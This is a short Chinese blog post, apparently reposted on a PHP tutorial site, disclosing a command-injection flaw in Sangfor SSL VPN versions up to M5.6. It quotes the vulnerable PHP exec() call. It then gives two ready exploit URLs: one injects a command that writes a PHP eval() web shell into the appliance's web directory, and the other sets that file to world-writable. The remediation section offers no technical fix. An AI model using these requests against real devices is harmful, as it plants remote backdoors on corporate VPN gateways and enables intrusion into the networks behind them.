网站地图    收藏   

主页 > 后端 > 网站安全 >

深信服ssl vpn远程代码执行漏洞及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 深信服的程序员安全意识太低了,直接一个参数可以执行任意命令$args = $_REQUEST[#39;cmd#39;];/*something here*/exec(tsutil -proxy $ip $args, $output, $ret);懂php exec函数的都一眼看出问题版......

深信服的程序员安全意识太低了,直接一个参数可以执行任意命令
 
$args = $_REQUEST['cmd'];
/*something here*/
exec("tsutil -proxy $ip $args", $output, $ret);
 
懂php exec函数的都一眼看出问题
 
版本SSLVPN M5.6及以下 没测试最新版本
 
 
http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php
 
执行echo '<?php eval($_POST[cmd]);?>' >/app/usr/sbin/webui/html/svpn.php 生成一句话
 
http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod 777 /app/usr/sbin/webui/html/svpn.php
 
修改svpn权限
 


 
SSLVPN.SANGFOR.COM不是真实地址 只是一个例子
 
 
 
$args = $_REQUEST['cmd'];
$ip = $_SERVER['REMOTE_ADDR'];
exec("tsutil -proxy $ip $args", $output, $ret);
修复方案:
哎 我还能说什么
去找人做个程序员安全编程意识培训

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论